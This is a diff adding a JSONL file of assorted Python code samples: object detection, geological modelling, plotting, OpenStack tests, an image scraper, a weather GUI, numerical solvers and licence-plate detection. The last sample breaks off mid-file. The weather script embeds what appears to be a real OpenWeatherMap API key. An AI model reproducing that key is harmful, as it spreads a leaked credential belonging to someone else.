diff --git "a/4501.jsonl" "b/4501.jsonl" new file mode 100644--- /dev/null +++ "b/4501.jsonl" @@ -0,0 +1,668 @@ +{"seq_id":"67005395","text":"from dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Iterable\n\nimport PIL.Image\nimport PIL.ImageFont\nimport edgetpu.detection.engine\n\nfrom robot_cameraman.box import Box\n\n\n@dataclass\nclass DetectionCandidate:\n label_id: int\n score: float\n bounding_box: Box\n\n\nclass DetectionEngine:\n def __init__(\n self,\n model: Path,\n confidence: float,\n max_objects: int) -> None:\n self._engine = edgetpu.detection.engine.DetectionEngine(str(model))\n self._confidence = confidence\n self._max_objects = max_objects\n\n def detect(self, image: PIL.Image.Image) -> Iterable[DetectionCandidate]:\n return map(\n lambda dc: DetectionCandidate(dc.label_id, dc.score,\n Box.from_points_iterable(\n dc.bounding_box)),\n self._engine.DetectWithImage(\n image,\n threshold=self._confidence,\n keep_aspect_ratio=True,\n relative_coord=False,\n top_k=self._max_objects))\n","sub_path":"robot_cameraman/image_detection.py","file_name":"image_detection.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"29960781","text":"# standart libs\nimport sys\nimport random\nimport copy\nimport cProfile\n\n\n# 3rd party libs\nimport pandas as pd\nimport numpy as np\nimport gempy as gp\nimport matplotlib.pyplot as plt\n\n\n# local\nimport functions.realization_setup as real_setup\nimport functions.realization_run as real_run\nimport functions.post_processing as post_pro\nimport functions.uq_runs as uq_runs\n\n\n# instantiate the geo_model\ngeo_model = gp.create_model(\"GeoModel\")\n\n# defautl data\ngeo_model = gp.init_data(\n geo_model,\n extent=[0, 1, 0, 1, 0, 1],\n resolution=[1, 1, 1]\n)\n\n# compile theno function\ngp.set_interpolation_data(\n geo_model,\n compile_theano=True,\n theano_optimizer='fast_run',\n)\n\n\n# 
meta\ngeo_model_extent_1 = [0,1000,0,1000,0,1000]\nsection_1 = {\n 'p1': [0, 500],\n 'p2': [1000, 500],\n 'resolution': [200, 200]\n}\n\n# sereis\nseries_df_1 = pd.DataFrame(columns=['name', 'isfault', 'order_series'])\nseries_df_1.loc[0] = { 'order_series': 0, 'name': 'Basement_Series', 'isfault': False }\nseries_df_1.loc[1] = { 'order_series': 1, 'name': 'Strat_Series', 'isfault': False }\n\n# surfaces\nsurfaces_df_1 = pd.DataFrame(columns=['name', 'serie', 'order_surface'])\nsurfaces_df_1.loc[0] = { 'name': 'basement', 'serie': 'Basement_Series', 'order_surface': 0 }\nsurfaces_df_1.loc[2] = { 'name': 'rock1', 'serie': 'Strat_Series', 'order_surface': 1 }\nsurfaces_df_1.loc[1] = { 'name': 'rock2', 'serie': 'Strat_Series', 'order_surface': 2 }\n\n# geoData\nsurface_points_input_data_1 = pd.read_csv('./data/model2_surface_points.csv')\norientaions_input_data_1 = pd.read_csv('./data/model2_orientations.csv')\n\n# Format geological_input_data\nsurface_points_original_df_1 = surface_points_input_data_1[['X', 'Y', 'Z', 'formation']]\n\n# rename colums\nsurface_points_original_df_1.columns = ['X', 'Y', 'Z', 'surface']\n\n# add distribution type and parameter\nsurface_points_original_df_1['param1'] = 10\n\n# Orientaions\norientations_original_df_1 = orientaions_input_data_1[['X', 'Y', 'Z', 'dip', 'azimuth', 'polarity', 'formation']]\n\n\n# %%timeit\n# setup model 1\nreal_setup.setup_realization(\n geo_model=geo_model,\n geo_model_extent=geo_model_extent_1,\n section=section_1,\n series_df=series_df_1,\n surfaces_df=surfaces_df_1,\n surface_points_original_df=surface_points_original_df_1,\n orientations_original_df=orientations_original_df_1\n)\n\nif real_run.check_setup_single_realization(geo_model):\n solution = gp.compute_model(model=geo_model, sort_surfaces=False)\n","sub_path":"server-gempy/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"474667314","text":"#!/usr/bin/env python\n\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Use plot.ly to visualize walkers.\")\nparser.add_argument(\"--burn\", type=int, default=0, help=\"How many samples to discard from the beginning of the chain for burn in.\")\nparser.add_argument(\"--chain\", default=\"chain.npy\", help=\"The name of the file storing the walker positions.\")\nparser.add_argument(\"--name\", default=\"hist\", help=\"The name of the object that we are fitting. The plot.ly plots will show up under this label.\")\n\nargs = parser.parse_args()\n\nimport numpy as np\n\nchain = np.load(args.chain)\n\n# Convention within the Julia EnsembleSampler is\n# ndim, niter, nwalkers = chain.shape\n# However, when written to disk, we should have been following the emcee convention\nnwalkers, niter, ndim = chain.shape\n\n# nsamples = nwalkers * niter\n# Flatchain is made after the walkers have been burned\n# flatchain = np.reshape(chain, (nsamples, ndim))\n\n\nfrom plotly import tools\nimport plotly.plotly as py\nimport plotly.graph_objs as go\n\n# First, let's try to make a single 2D contour and a single histogram\n\n\n\nfig = tools.make_subplots(rows=ndim, cols=1, shared_xaxes=True, vertical_spacing=0.005)\n\nx = np.arange(niter)\n\n# Label the axes appropriately based upon how many parameters we have\nif ndim == 10:\n labels = [r\"$M_\\ast\\quad [M_\\odot]$\", r\"$r_c$ [AU]\", r\"$T_{10}$ [K]\", r\"$q$\", r\"$\\log M_\\mathrm{gas} \\quad \\log [M_\\odot]$\", r\"$\\xi$ [km/s]\", r\"$i_d \\quad [{}^\\circ]$\", r\"PA $[{}^\\circ]$\", r\"$v_r$ [km/s]\", r\"$\\mu_\\alpha$ ['']\", r\"$\\mu_\\delta$ ['']\"]\nelif ndim == 11:\n labels = [r\"$M_\\ast\\quad [M_\\odot]$\", r\"$r_c$ [AU]\", r\"$T_{10}$ [K]\", r\"$q$\", r\"$\\log M_\\mathrm{gas} \\quad \\log [M_\\odot]$\", r\"$\\xi$ [km/s]\", r\"$d$ [pc]\", r\"$i_d \\quad [{}^\\circ]$\", r\"PA $[{}^\\circ]$\", r\"$v_r$ [km/s]\", r\"$\\mu_\\alpha$ ['']\", r\"$\\mu_\\delta$ ['']\"]\nelse:\n 
labels = None\n","sub_path":"scripts/plotly_hist.py","file_name":"plotly_hist.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"276354255","text":"# Copyright 2014: Rackspace UK\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\n\nfrom rally.benchmark.context import keypair\nfrom tests import test\n\nCTX = \"rally.benchmark.context\"\n\n\nclass KeyPairContextTestCase(test.TestCase):\n\n def setUp(self):\n super(KeyPairContextTestCase, self).setUp()\n self.users = 2\n task = mock.MagicMock()\n self.ctx_with_keys = {\n \"users\": [\n {\"keypair\": \"key\", \"endpoint\": \"endpoint\"},\n ] * self.users,\n \"task\": task\n }\n self.ctx_without_keys = {\n \"users\": [{'endpoint': 'endpoint'}] * self.users,\n \"task\": task\n }\n\n @mock.patch(\"%s.keypair.Keypair._generate_keypair\" % CTX)\n def test_keypair_setup(self, mock_generate):\n mock_generate.return_value = \"key\"\n keypair_ctx = keypair.Keypair(self.ctx_without_keys)\n keypair_ctx.setup()\n self.assertEqual(self.ctx_without_keys, self.ctx_with_keys)\n\n @mock.patch('rally.osclients.Clients')\n @mock.patch(\"%s.keypair.Keypair._keypair_safe_remove\" % CTX)\n def test_keypair_cleanup(self, mock_safe_remove, mock_osclients):\n keypair_ctx = keypair.Keypair(self.ctx_with_keys)\n keypair_ctx.cleanup()\n mock_clients = mock_osclients.return_value\n mock_nova = 
mock_clients.nova.return_value\n self.assertEqual(\n [mock.call(mock_nova)]\n * self.users,\n mock_safe_remove.mock_calls\n )\n\n @mock.patch(\"%s.keypair.Keypair._keypair_safe_remove\" % CTX)\n @mock.patch('rally.osclients.Clients')\n def test_keypair_generate(self, mock_osclients, mock_safe_remove):\n keypair_ctx = keypair.Keypair(self.ctx_without_keys)\n keypair_ctx._generate_keypair('endpoint')\n mock_clients = mock_osclients.return_value\n mock_nova = mock_clients.nova.return_value\n self.assertIn(\n mock.call().nova().keypairs.create('rally_ssh_key'),\n mock_osclients.mock_calls\n )\n mock_safe_remove.assert_called_once_with(mock_nova)\n\n def test_keypair_safe_remove(self):\n mock_nova = mock.MagicMock()\n keypair_ctx = keypair.Keypair(self.ctx_without_keys)\n keypair_ctx._keypair_safe_remove(mock_nova)\n self.assertEqual(\n [mock.call.delete('rally_ssh_key')],\n mock_nova.keypairs.mock_calls)\n","sub_path":"tests/benchmark/context/test_keypair.py","file_name":"test_keypair.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"343363167","text":"import requests\nimport sys\nimport lxml.html\nimport urllib.parse as parse\nimport posixpath\nimport os\n\nr = requests.get('http://www.jpl.nasa.gov/spaceimages/') \nparsed= lxml.html.fromstring(r.text)\nimages = parsed.xpath('//img/@src')\n#xpath for high res images below\n#images = parsed.xpath('//*[contains(@class, \"fancybox\")]/@data-fancybox-href')\n\nif not images:\n sys.exit(\"found no pictures\")\nimages = [parse.urljoin(r.url, url) for url in images if 'wallpaper' in url]\nprint (images)\n\nprint ('found %s pictures' % len(images))\n\nfor url in images:\n path = parse.urlsplit(url).path\n filename = posixpath.basename(path)\n if not os.path.exists(filename):\n print (\"downloading {} to {}\".format(url, filename))\n r = requests.get(url)\n with open(filename, 'wb') as image:\n image.write(r.content)\n else:\n 
print (\"Skpping {}, already exists\".format(filename))\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"470359578","text":"__author__ = 'liuwei'\n\nimport nltk\nimport pandas as pd \nimport numpy as np \nimport re \n\nfrom bs4 import BeautifulSoup\nfrom nltk.corpus import stopwords\n\nclass Common(object):\n '''the common operator for the review'''\n\n @staticmethod\n def get_clean_review(review):\n '''remove some useless charactor'''\n\n #1.remove html makeup, such as ,

,
\n review_text = BeautifulSoup(review, 'html.parser').get_text()\n\n\n #2. remove non-letters\n review_text = re.sub(\"[^a-zA-Z]\", \" \", review_text)\n\n #3. all to lower\n review_text = review_text.lower()\n\n return review_text\n\n\n @staticmethod\n def review_to_wordlist(review, remove_stopwords=False):\n '''transform the review to a word list'''\n\n review_text = Common.get_clean_review(review)\n\n words = review_text.split()\n \n #remove the word in stopwords list\n if remove_stopwords:\n stops = set(stopwords.words(\"english\"))\n words = [w for w in words if not w in stops]\n\n return words\n\n\n @staticmethod\n def review_to_sentences(review, tokenizer, remove_stopwords=False):\n '''transform the review to sentences'''\n\n #1. use the NLTK tokenizer to split the paragraph into sentences, the split punction may be '.' or '!' or '?' and so on\n raw_sentences = tokenizer.tokenize(review.strip())\n \n #2. loop over each sentence\n sentences = []\n for raw_sentence in raw_sentences:\n if len(raw_sentence) > 0:\n sentences.append(Common.review_to_wordlist(raw_sentence, remove_stopwords))\n\n\n return sentences\n\n\n","sub_path":"Common.py","file_name":"Common.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"588405670","text":"\n#!/usr/bin/env python3\n\n# Created by Marwan Mashaly\n# Created on December 2019\n# This program fFinds the weather of a certain city\n\nimport pyowm\nfrom tkinter import * \nfrom tkinter.ttk import *\nfrom PIL import ImageTk,Image\n\nroot = Tk() \nroot.title('Weather')\nroot.configure(background = \"sky blue\")\n#root.geometry(\"320x480\")\n\n#opening images getting them ready\nimg = Image.open(r'/home/pi/Downloads/sno3.png') \n\n# Styling the label widget\n\nlabel = Label(root, text = \"Weather\", font = ('calibri', 25, 'bold'), foreground = 'yellow', background = 'sky blue')\nlabel2 = Label(root, text = \"Clouds :\", font = ('calibri', 
16), foreground = 'white', background = 'sky blue')\nlabel3 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\nlabel4 = Label(root, text = \"Rain : \", font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel5 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\nlabel6 = Label(root, text = \"snow :\", font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel7 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\nlabel8 = Label(root, text = \"fog :\",font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel9 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\nlabel10 = Label(root, text = \"Temprature in Celsius :\", font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel11 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\nlabel12 = Label(root, text = \"weather details\", font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel13 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\nlabel14 = Label(root, text = \"Wind Speed\", font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel15 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\nlabel16 = Label(root, text = \"Cloud coverage (in percent) :\", font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel17 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\n#label18 = Label(root, text = \"Sun: \", font = ('calibri', 16), foreground = 'white', background = 'black')\n#label19 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'black')\nlabel20 = Label(root, text = \"location 
: \", font = ('calibri', 16), foreground = 'white', background = 'sky blue')\nlabel21 = Label(root, text = \"\", font = ('calibri', 12), foreground = 'white', background = 'sky blue')\n\n#label.pack(anchor = 'center')\nlabel.grid(row = 1, column = 0)\nlabel2.grid(row = 5, column = 0)\nlabel3.grid(row = 5, column = 2)\nlabel4.grid(row = 6, column = 0)\nlabel5.grid(row = 6, column = 2)\nlabel6.grid(row = 7, column = 0)\nlabel7.grid(row = 7, column = 2)\nlabel8.grid(row = 8, column = 0)\nlabel9.grid(row = 8, column = 2)\nlabel10.grid(row = 9, column = 0)\nlabel11.grid(row = 9, column = 2)\nlabel12.grid(row = 10, column = 0)\nlabel13.grid(row = 10, column = 2)\nlabel14.grid(row = 11, column = 0)\nlabel15.grid(row = 11, column = 2)\nlabel16.grid(row = 12, column = 0)\nlabel17.grid(row = 12, column = 2)\n#label18.grid(row = 13, column = 0)\n#label19.grid(row = 13, column = 2)\nlabel20.grid(row = 13, column = 0)\nlabel21.grid(row = 13, column = 2)\n#label.grid(row = 5, column = 1)\n\n\n# adding an image to tkinter\n#canvas=Canvas(root,width=300,height=480)\n#image=ImageTk.PhotoImage(Image.open(\"C:\\\\Users\\\\marwa\\\\OneDrive\\\\Pictures\\\\cloudy.gif\"))\n#label = Label(image=image)\n\n#label.grid(row = 14, column = 2)\n\n\ndef main():\n # This\n\n owm = pyowm.OWM('3a65677897148889d39423a3ce8e1716') # You MUST provide a valid API key\n ottawa = owm.three_hours_forecast('Ottawa, Canada')\n \n loc = \"Ottawa\"\n label21.config(text = loc)\n\n clouds = ottawa.will_have_clouds()\n fog = ottawa.will_have_fog()\n rain = ottawa.will_have_rain()\n snow = ottawa.will_have_snow()\n\n #if clouds == 1:\n # img = Image.open(r'C:\\\\Users\\\\marwa\\\\Downloads\\\\clearSky.jpg') \n # tkimage = ImageTk.PhotoImage(img)\n # img = img.resize((250, 250), Image.ANTIALIAS)\n #tkimage.geometry(\"120x80\")\n #Label(root, image=tkimage, text=\" There is clouds today\").grid(row = 5, column = 2) # Put it in the display window\n # else:\n # img = 
Image.open(r'C:\\\\Users\\\\marwa\\\\Downloads\\\\clearSky.jpg') \n # tkimage = ImageTk.PhotoImage(img)\n # img = img.resize((250, 250), Image.ANTIALIAS)\n #tkimage.geometry(\"120x80\")\n # Label(root, image=tkimage, text=\" There is no clouds today\").grid(row = 5, column = 2) # Put it in the display window\n\n if rain == 1:\n rain = \"there is rain today\"\n else:\n rain = \"there is no rain today\"\n if snow == 1:\n snow = \"there is snow today\"\n else:\n snow = \"there is no snow today\"\n if fog == 1:\n fog = \"there is fog today\"\n else:\n fog = \"there is no fog today\"\n if clouds == 1:\n clouds = \"there is clouds today \"\n else:\n clouds = \"there is no clouds today\"\n\n label3.config(text = clouds)\n label5.config(text = rain)\n label7.config(text = snow)\n label9.config(text = fog)\n # label19.config(text = sun)\n \n ott = owm.weather_at_place('Ottawa, Canada')\n weather = ott.get_weather()\n temp = weather.get_temperature('celsius')['temp']\n temp = round(temp)\n label11.config(text = temp)\n\n description = weather.get_detailed_status()\n label13.config(text = description)\n\n wind = weather.get_wind()\n label15.config(text = wind)\n\n cloud_cov = weather.get_clouds() \n label17.config(text = cloud_cov)\n\n\nif __name__ == \"__main__\":\n main()\n\nroot.mainloop()\n\n","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507101807","text":"# Functions for Discontinuous Galerkin Method\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy.interpolate import *\nfrom ReferenceElement import *\nimport os\nimport imageio\n\n# Range Kutta 4 \n# This is Tstepper for Evolve\n# F is the derivative\ndef RK4_Step(dt, F,u, K, N,t,a,alpha, M_inv, M_inv_S, g = None,v= None, potential = None,un = None):\n w1 = F(u , K, N, t ,a, alpha, M_inv, M_inv_S, g,v,potential)\n w2 = F(u + 0.5*dt*w1, K, N, t + 0.5*dt,a, 
alpha, M_inv, M_inv_S, g,v,potential)\n w3 = F(u + 0.5*dt*w2, K, N, t + 0.5*dt,a, alpha, M_inv, M_inv_S, g,v,potential)\n w4 = F(u + dt*w3 , K, N, t + dt ,a, alpha, M_inv, M_inv_S, g,v,potential)\n next_u = u + dt/6*(w1+2*w2+2*w3+w4)\n return next_u\n\n# Get optimal LGL spatial grid-points for Discontinuous Galerkin method\n# Return an array of K arrays of grid-points, one for each element D_k\n# Parameter reference_interval is the first output of ReferenceElement(N), \n# which returns LGL collocation points on reference interval [-1,1] to be mapped to our real interval [start,end]\n\ndef get_x_elements(start, end, K, reference_interval): #LGL points\n h = (end-start)/K #Element width\n x_elements = []\n for k in range(K):\n element = []\n for r_i in reference_interval:\n element.append(start + k*h+(r_i+1)/2*h)\n x_elements.append(element)\n return np.asarray(x_elements)\n\n#Get smallest spatial spacing dxmin in a DG scheme with LGL points\n#Output used with Courant factor to calculate suitable size for time step dt \n\ndef get_dx_min(x_elements):\n a = x_elements[0]\n dxarray = np.empty_like(a)\n for i in range(len(a)):\n dxarray[i] = np.abs(a[i]-a[(i+1)%len(a)])\n return np.min(dxarray)\n\n\n# Calculate time derivative for each element D_k\n# M_inv_S is the 3rd output of ReferenceElement.py --> ReferenceElement(N)[2], after being scaled\n# by multiplying with 2/h, where 2 come from reference interval interval [-1,1], h is the real width of each element)\n\ndef Evolve(t_initial, t_final, Tstepper, F,CF, start, end, initial_value_function, K, N,a,alpha,g= None):\n h = (end-start)/K\n\n reference_element = ReferenceElement(N)\n reference_interval = reference_element[0]\n M_inv = reference_element[1]*2/h\n M_inv_S = reference_element[2]*2/h\n\n x = get_x_elements(start,end, K, reference_interval)\n u = initial_value_function(x,t_initial)\n\n dx_min = get_dx_min(x)\n dt = CF*dx_min\n nt = int((t_final - t_initial)/dt) #number of time steps to be evolved \n\n t = 
t_initial\n\n for n in range(nt):\n\n u = RK4_Step(dt,F,u, K,N,t,a,alpha,M_inv, M_inv_S,g)\n t = t + dt\n \n return t, u, x\n \n# Radiative boundary conditions\ndef f_star_at_x_k_radiative(u,k,K,N,t,a,alpha): \n u_braces = (u[(k-1)%K][N] + u[(k)%K][0])/2 #average \n u_brackets = u[(k-1)%K][N] - u[(k)%K][0] #difference\n \n \"\"\"if a>0:\n #if k == 0:\n # u_braces = u[k][0]/2\n # u_brackets = -u[k][0]\n if k == K:\n u_braces = u[-1][-1]/2\n u_brackets = -u[-1][-1]\n else:\n if k == K:\n u_braces = u[-1][-1]/2\n u_brackets = -u[-1][-1]\n if k == 0:\n u_braces = u[k][0]/2\n u_brackets = -u[k][0]\"\"\"\n\n f_star = a*u_braces + np.abs(a)*(1-alpha)/2*u_brackets\n \n \n ###testing May 29\n if a > 0:\n if k == 0:\n f_star = 0\n #if k == K:\n # f_star = 0\n else: \n #if k == K:\n # f_star = -2*np.pi*np.cos(2*np.pi*(1+t))\n if k == 0:\n f_star = -2*np.pi*np.cos(2*np.pi*t)\n \n \n return f_star \n\ndef du_dt_element_k_radiative(u,k, K, N,t,a,alpha, M_inv, M_inv_S, delta_source = None,un = None):\n first_term = -a*np.matmul( M_inv_S , u[k])\n second_term = M_inv[:,N] * (a*u[k][-1] - f_star_at_x_k_radiative(u,k+1,K,N,t,a,alpha)) #information from element on the right\n third_term = -M_inv[:,0] * (a*u[k][0] - f_star_at_x_k_radiative(u,k ,K,N,t,a,alpha)) #information from element on the left\n \n du_dt_element = first_term + second_term + third_term\n \n if a > 0: \n a=a\n if k == K-1:\n du_dt_element = first_term + third_term \n #if k == 0:\n # du_dt_element = first_term + second_term\n else:\n if k == 0:\n du_dt_element = first_term + second_term\n if k == K-1:\n try:\n second_term = M_inv[:,N] * (a*u[k][-1] - np.matmul(M_inv_S, un[-1])[-1])\n du_dt_element = first_term + second_term + third_term\n except TypeError:\n pass\n #if k == K-1:\n # du_dt_element = first_term + third_term \n \n\n return du_dt_element\n\ndef DG_du_dt_radiative(u, K, N,t,a,alpha, M_inv, M_inv_S,delta_source = None, v = None, potential = None,un = None):\n du_dt_elements = np.empty_like(u)\n for k in 
range(K):\n du_dt_elements[k] = du_dt_element_k_radiative(u,k, K, N,t,a,alpha, M_inv, M_inv_S,delta_source)\n \n try:\n return du_dt_elements + v + potential\n except TypeError:\n try:\n return du_dt_elements + v\n except TypeError:\n try:\n return du_dt_elements + potential\n except TypeError:\n return du_dt_elements\n\n\n\ndef interpolated_plot(u_elements,x_elements, nx_element):\n interpolated_u = np.empty((len(u_elements), nx_element))\n smooth_x = np.empty_like(interpolated_u)\n\n for i in range(len(u_elements)):\n smooth_x_element = np.linspace(x_elements[i][0],x_elements[i][-1],nx_element,True)\n interpolated_u_element = lagrange(x_elements[i],u_elements[i])(smooth_x_element)\n\n smooth_x[i] = smooth_x_element\n interpolated_u[i] = interpolated_u_element\n \n #plotting\n plt.plot(smooth_x_element,interpolated_u_element) # interpolated lagrange polynomials\n plt.scatter(x_elements[i],u_elements[i]) # nodal points\n ","sub_path":"5_30_reflecting_testing_2/DG_functions_wave_testing.py","file_name":"DG_functions_wave_testing.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"140449524","text":"import cv2\nimport numpy as np\nimport imutils\n\nclass DetectionOpenCV():\n def __init__(self, _SizeMax = 5000, _SizeMin = 900, _ResizeWidth = 620, _ResizeHeight = 480, _CannyThreshold1 = 30, _CannyThreshold2 = 200):\n self.sizeMax = _SizeMax # Kích thước ước lượng biển số lớn nhất trong ảnh\n self.sizeMin = _SizeMin # Kích thước ước lượng biển số nhỏ nhất trong ảnh\n self.resizeWidth = _ResizeWidth # Chiều rộng resize ảnh\n self.resizeHeight = _ResizeHeight # Chiều rộng resize ảnh\n self.cannyThreshold1 = _CannyThreshold1 # Ngưỡng 1 phát hiện cạnh biên canny\n self.cannyThreshold2 = _CannyThreshold2 # Ngưỡng 2 phát hiện cạnh biên canny\n \n def detection(self, _ImgInput):\n # Param\n max_size = self.sizeMax\n min_size = self.sizeMin\n\n # Resize image\n img = 
cv2.resize(_ImgInput, (self.resizeWidth, self.resizeHeight))\n\n # Edge detection\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # convert to grey scale\n gray = cv2.bilateralFilter(gray, 11, 17, 17) # Blur to reduce noise\n edged = cv2.Canny(gray, self.cannyThreshold1, self.cannyThreshold2) # Perform Edge detection\n\n # Find contours in the edged image, keep only the largest ones, and initialize our screen contour\n cnts = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n cnts = sorted(cnts, key=cv2.contourArea, reverse=True)\n screenCnt = None\n\n # Loop over our contours\n for c in cnts:\n # approximate the contour\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.05 * peri, True)\n\n # if our approximated contour has four points, then\n # we can assume that we have found our screen\n if len(approx) == 4 and max_size > cv2.contourArea(c) > min_size:\n screenCnt = approx\n break\n\n img_plate = np.array([]) \n if screenCnt is None:\n detected = 0\n return 0, img_plate\n else:\n detected = 1\n\n if detected == 1:\n cv2.drawContours(img, [screenCnt], -1, (0, 255, 0), 3)\n\n # Masking the part other than the number plate\n mask = np.zeros(gray.shape, np.uint8)\n new_image = cv2.drawContours(mask, [screenCnt], 0, 255, -1, )\n new_image = cv2.bitwise_and(img, img, mask=mask)\n\n # Now crop\n (x, y) = np.where(mask == 255)\n (topx, topy) = (np.min(x), np.min(y))\n (bottomx, bottomy) = (np.max(x), np.max(y))\n img_plate = gray[topx:bottomx + 1, topy:bottomy + 1]\n return 1, img_plate","sub_path":"DetectionOpenCV.py","file_name":"DetectionOpenCV.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"86716401","text":"__author__ = 'Jennifer'\n\nimport argparse\n\ndescrp = 'Reads in two .gro files and outputs single .gro'\n\nparser = argparse.ArgumentParser(description=descrp)\n\nparser.add_argument('-f1', 
help='First input gro')\nparser.add_argument('-f2', help='Second input gro')\nparser.add_argument('-o', help='Output gro')\nparser.add_argument('-head', help='Header for output gro')\nparser.add_argument('-v', action='store_true', help=\n 'Verbose')\nparser.add_argument('-b', help='Box size (e.g. \\'5 5 5\\'). '\n 'Default is box size of second '\n 'gro file.')\n\nargs = parser.parse_args()\n\ngrofilename1 = args.f1\ngrofilename2 = args.f2\noutfilename = args.o\nheader = args.head\n\ngrofile1 = open(grofilename1, 'r')\ngrofile2 = open(grofilename2, 'r')\ngroarray = []\n\nnumlines1 = 0\nnumlines2 = 0\nnumlines = 0\nnumatom1 = 0\nnumatom2 = 0\n\n''' First two lines in gro file are header and number\n of atoms. Don't care about headers, just the num\n of atoms.'''\nwhile numlines < 2:\n newline1 = grofile1.readline()\n newline2 = grofile2.readline()\n if numlines == 1:\n numatom1 = int(newline1)\n numatom2 = int(newline2)\n numlines += 1\n\n''' Read in first gro file atoms '''\nwhile 1:\n if numlines1 >= numatom1:\n break\n newline1 = grofile1.readline()\n groarray.append(newline1)\n numlines1 += 1\n\n''' Read in second gro file atoms '''\nwhile 1:\n if numlines2 >= numatom2:\n break\n newline2 = grofile2.readline()\n groarray.append(newline2)\n numlines2 += 1\n\noutfile = open(outfilename, 'w')\noutfile.write(header + '\\n')\noutfile.write(str(numatom1 + numatom2) + '\\n')\nfor x in groarray:\n outfile.write(x)\n\n# The last line in the files is the box size\nif args.b == None:\n outfile.write(grofile2.readline())\nelse:\n outfile.write(args.b)\n\n\n","sub_path":"mergegro.py","file_name":"mergegro.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365844813","text":"from mpi4py import MPI \nimport numpy as np\nimport time\nimport scipy.stats as sts\nfrom scipy.optimize import minimize\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\ndef 
simulation(rho):\n mu = 3.0 \n sigma = 1.0 \n z_0 = mu\n\n # Set simulation parameters, draw all idiosyncratic random shocks, \n # # and create empty containers \n S = int(1000/size) # Set the number of lives to simulate \n T = int(4160) # Set the number of periods for each simulation \n np.random.seed(25)\n eps_mat = sts.norm.rvs(loc=0, scale=sigma, size=(T, S)) \n z_mat = np.zeros((T, S)) \n z_mat[0, :] = z_0\n\n tracker = np.array([])\n for s_ind in range(S): \n z_tm1 = z_0 \n for t_ind in range(T): \n e_t = eps_mat[t_ind, s_ind] \n z_t = rho * z_tm1 + (1 - rho) * mu + e_t \n if z_t <= 0:\n tracker = np.append(tracker, t_ind)\n break\n else:\n z_tm1 = z_t\n \n tracker_all = None\n if rank == 0:\n tracker_all = np.empty([S*size], dtype='float')\n comm.Gather(sendbuf = tracker, recvbuf = tracker_all, root=0)\n\n return -tracker_all.mean()\n\ndef main():\n\n t0 = time.time()\n x0 = [0.1]\n res = minimize(simulation, x0, method='Nelder-Mead')\n time_elapsed = time.time() - t0\n print('Optimized rho: {}'.format(res.x[0]))\n print('Max Value: {}'.format(res.fun))\n print('Time taken: {}'.format(time_elapsed))\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"q4_mpi.py","file_name":"q4_mpi.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"604447293","text":"from core.processor import Processor\n\n\nclass FIND_THEN_COLLECTProcessor(Processor):\n TPL: str = '{\"collectby\":\"id|xpath|css\",\"identity\":\"\",\"value_type\":\"text|value|any\", \"value_key\":\"name_of_collect\"}'\n\n def process(self):\n\n chrome = self.get_data_by_param_default_data('chrome_name', 'chrome')\n\n 